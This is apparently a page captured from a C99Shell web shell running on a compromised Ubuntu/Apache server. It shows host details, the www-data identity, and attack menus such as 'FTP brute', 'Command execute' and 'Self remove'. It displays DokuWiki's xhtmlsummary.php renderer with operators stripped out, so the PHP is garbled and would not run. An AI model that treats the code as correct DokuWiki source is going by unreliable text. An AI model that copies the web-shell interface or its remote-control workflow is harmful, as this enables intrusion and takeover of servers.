!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/doku/axrepos/axess/old/wiki/inc/parser/   drwxrwxr-x
Free 11.5 GB of 97.11 GB (11.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xhtmlsummary.php (2.46 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if(!defined('DOKU_INC')) define('DOKU_INC',fullpath(dirname(__FILE__).'/../../').'/');

require_once 
DOKU_INC 'inc/parser/xhtml.php';

/**
 * The summary XHTML form selects either up to the first two paragraphs
 * it find in a page or the first section (whichever comes first)
 * It strips out the table of contents if one exists
 * Section divs are not used - everything should be nested in a single
 * div with CSS class "page"
 * Headings have their a name link removed and section editing links
 * removed
 * It also attempts to capture the first heading in a page for
 * use as the title of the page.
 *
 *
 * @author Harry Fuecks <hfuecks@gmail.com>
 * @todo   Is this currently used anywhere? Should it?
 */
class Doku_Renderer_xhtmlsummary extends Doku_Renderer_xhtml {

    
// Namespace these variables to
    // avoid clashes with parent classes
    
var $sum_paragraphs 0;
    var 
$sum_capture true;
    var 
$sum_inSection false;
    var 
$sum_summary '';
    var 
$sum_pageTitle false;

    function 
document_start() {
        
$this->doc .= DOKU_LF.'<div>'.DOKU_LF;
    }

    function 
document_end() {
        
$this->doc $this->sum_summary;
        
$this->doc .= DOKU_LF.'</div>'.DOKU_LF;
    }

    
// FIXME not supported anymore
    
function toc_open() {
        
$this->sum_summary .= $this->doc;
    }

    
// FIXME not supported anymore
    
function toc_close() {
        
$this->doc '';
    }

    function 
header($text$level$pos) {
        if ( !
$this->sum_pageTitle ) {
            
$this->info['sum_pagetitle'] = $text;
            
$this->sum_pageTitle true;
        }
        
$this->doc .= DOKU_LF.'<h'.$level.'>';
        
$this->doc .= $this->_xmlEntities($text);
        
$this->doc .= "</h$level>".DOKU_LF;
    }

    function 
section_open($level) {
        if ( 
$this->sum_capture ) {
            
$this->sum_inSection true;
        }
    }

    function 
section_close() {
        if ( 
$this->sum_capture && $this->sum_inSection ) {
            
$this->sum_summary .= $this->doc;
            
$this->sum_capture false;
        }
    }

    function 
p_open() {
        if ( 
$this->sum_capture && $this->sum_paragraphs ) {
            
$this->sum_paragraphs++;
        }
        
parent :: p_open();
    }

    function 
p_close() {
        
parent :: p_close();
        if ( 
$this->sum_capture && $this->sum_paragraphs >= ) {
            
$this->sum_summary .= $this->doc;
            
$this->sum_capture false;
        }
    }

}


//Setup VIM: ex: et ts=2 enc=utf-8 :

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 1.5436 ]--